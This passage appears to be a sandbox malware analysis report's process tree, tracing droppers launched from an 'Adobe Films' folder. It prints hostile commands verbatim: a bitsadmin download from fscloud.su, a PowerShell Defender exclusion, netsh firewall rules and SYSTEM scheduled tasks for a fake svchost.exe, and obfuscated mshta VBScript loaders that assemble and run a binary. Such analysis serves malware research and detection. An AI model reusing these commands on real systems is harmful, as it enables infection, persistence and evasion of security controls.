                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                    8⤵
                                                                      PID:7116
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec4718
                                                                        9⤵
                                                                          PID:5992
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                        8⤵
                                                                          PID:8012
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec4718
                                                                            9⤵
                                                                              PID:8160
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                            8⤵
                                                                              PID:2016
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec4718
                                                                                9⤵
                                                                                  PID:8784
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                8⤵
                                                                                  PID:9696
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0xdc,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec4718
                                                                                    9⤵
                                                                                      PID:7436
                                                                                • C:\Users\Admin\AppData\Local\Temp\27-7a456-b3a-2d0aa-9b3e4028e1ecf\Lucajulywe.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\27-7a456-b3a-2d0aa-9b3e4028e1ecf\Lucajulywe.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3028
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0lbibfr1.mhg\GcleanerEU.exe /eufive & exit
                                                                                    8⤵
                                                                                      PID:16020
                                                                                      • C:\Users\Admin\AppData\Local\Temp\0lbibfr1.mhg\GcleanerEU.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\0lbibfr1.mhg\GcleanerEU.exe /eufive
                                                                                        9⤵
                                                                                          PID:6860
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 296
                                                                                            10⤵
                                                                                            • Program crash
                                                                                            • Checks processor information in registry
                                                                                            • Enumerates system info in registry
                                                                                            PID:8264
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exe /qn CAMPAIGN="654" & exit
                                                                                        8⤵
                                                                                          PID:6700
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exe /qn CAMPAIGN="654"
                                                                                            9⤵
                                                                                            • Loads dropped DLL
                                                                                            • Enumerates connected drives
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:6892
                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tleamy2s.der\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634371499 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                              10⤵
                                                                                              • Enumerates connected drives
                                                                                              PID:8592
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zvxdyisr.xuw\any.exe & exit
                                                                                          8⤵
                                                                                            PID:6760
                                                                                            • C:\Users\Admin\AppData\Local\Temp\zvxdyisr.xuw\any.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\zvxdyisr.xuw\any.exe
                                                                                              9⤵
                                                                                                PID:7096
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zbuq3tzb.efr\gcleaner.exe /mixfive & exit
                                                                                              8⤵
                                                                                                PID:6824
                                                                                                • C:\Users\Admin\AppData\Local\Temp\zbuq3tzb.efr\gcleaner.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\zbuq3tzb.efr\gcleaner.exe /mixfive
                                                                                                  9⤵
                                                                                                    PID:7172
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7172 -s 296
                                                                                                      10⤵
                                                                                                      • Program crash
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      PID:8496
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eh53evty.pnl\autosubplayer.exe /S & exit
                                                                                                  8⤵
                                                                                                    PID:6908
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\eh53evty.pnl\autosubplayer.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\eh53evty.pnl\autosubplayer.exe /S
                                                                                                      9⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:7076
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"
                                                                                                        10⤵
                                                                                                          PID:7872
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"
                                                                                                          10⤵
                                                                                                            PID:11028
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"
                                                                                                            10⤵
                                                                                                              PID:12424
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"
                                                                                                              10⤵
                                                                                                                PID:13176
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"
                                                                                                                10⤵
                                                                                                                  PID:13876
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"
                                                                                                                  10⤵
                                                                                                                    PID:14432
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswEE5A.tmp\tempfile.ps1"
                                                                                                                    10⤵
                                                                                                                      PID:14908
                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                      "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                      10⤵
                                                                                                                      • Download via BitsAdmin
                                                                                                                      PID:15132
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\oyUPf1tOtiNIPxx3GV9BGX_U.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\oyUPf1tOtiNIPxx3GV9BGX_U.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5800
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\MbAulC41IUPtgTysOqxTGnoL.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\MbAulC41IUPtgTysOqxTGnoL.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6080
                                                                                                          • C:\Users\Admin\AppData\Roaming\5166190.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\5166190.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5764
                                                                                                          • C:\Users\Admin\AppData\Roaming\3931810.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\3931810.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:3564
                                                                                                          • C:\Users\Admin\AppData\Roaming\1001385.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\1001385.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:3500
                                                                                                          • C:\Users\Admin\AppData\Roaming\4040985.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\4040985.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                            PID:2104
                                                                                                          • C:\Users\Admin\AppData\Roaming\4795979.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\4795979.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:5976
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                        3⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:2996
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                        3⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:3256
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\3Epq67p4ckusTei5nXzNLNK0.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\3Epq67p4ckusTei5nXzNLNK0.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1744
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 276
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:5036
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\QYUmrdKRz8BDDtM93WnnT1fs.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\QYUmrdKRz8BDDtM93WnnT1fs.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3036
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 296
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:4864
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\2cueFNHmLXQajzNJ90hDfGNw.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\2cueFNHmLXQajzNJ90hDfGNw.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1552
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 296
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:5000
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\4aT3PF6SgnV8ZkLFpRL7NRID.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\4aT3PF6SgnV8ZkLFpRL7NRID.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1564
                                                                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                        "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4540
                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                        "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                        3⤵
                                                                                                          PID:3736
                                                                                                        • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                          "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1180
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\RvxGhnQ_OEMC18xXwR0VxQcn.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\RvxGhnQ_OEMC18xXwR0VxQcn.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1572
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\CPrpRnM8IeYXmA2gAu6BvtNE.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\CPrpRnM8IeYXmA2gAu6BvtNE.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:1508
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                          3⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2856
                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                          3⤵
                                                                                                            PID:5228
                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                            3⤵
                                                                                                              PID:5376
                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                              schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                              3⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:5924
                                                                                                            • C:\Windows\System\svchost.exe
                                                                                                              "C:\Windows\System\svchost.exe" formal
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Drops file in Windows directory
                                                                                                              PID:5132
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                4⤵
                                                                                                                  PID:5572
                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                  4⤵
                                                                                                                    PID:5196
                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                    4⤵
                                                                                                                      PID:4976
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\Ctryp2hRVmlso4rkGtOzVamP.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\Ctryp2hRVmlso4rkGtOzVamP.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:488
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:3488
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:5204
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4752
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\H9aHWEApAVLTEbLrPMUXwkhu.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\H9aHWEApAVLTEbLrPMUXwkhu.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2032
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1284
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 1668
                                                                                                                    3⤵
                                                                                                                    • Program crash
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:5844
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\vB85CLYRioIwOWyvE81XtmUq.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\vB85CLYRioIwOWyvE81XtmUq.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1920
                                                                                                                  • C:\Users\Admin\AppData\Roaming\4042726.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\4042726.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1788
                                                                                                                  • C:\Users\Admin\AppData\Roaming\5749535.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\5749535.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:3848
                                                                                                                  • C:\Users\Admin\AppData\Roaming\7151052.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\7151052.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:2108
                                                                                                                  • C:\Users\Admin\AppData\Roaming\250740.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\250740.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4672
                                                                                                                  • C:\Users\Admin\AppData\Roaming\5515576.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\5515576.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Adds Run key to start application
                                                                                                                    PID:5144
                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                      4⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5008
                                                                                                                  • C:\Users\Admin\AppData\Roaming\2074177.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\2074177.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5352
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4980
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                    3⤵
                                                                                                                      PID:1424
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\U6DuogN1ECFWruE4A0SlHzun.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                        4⤵
                                                                                                                          PID:4116
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                            8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:3152
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                              6⤵
                                                                                                                                PID:1264
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                  7⤵
                                                                                                                                    PID:2672
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                  6⤵
                                                                                                                                    PID:912
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                      7⤵
                                                                                                                                        PID:6020
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                          8⤵
                                                                                                                                            PID:3312
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                            8⤵
                                                                                                                                              PID:4444
                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
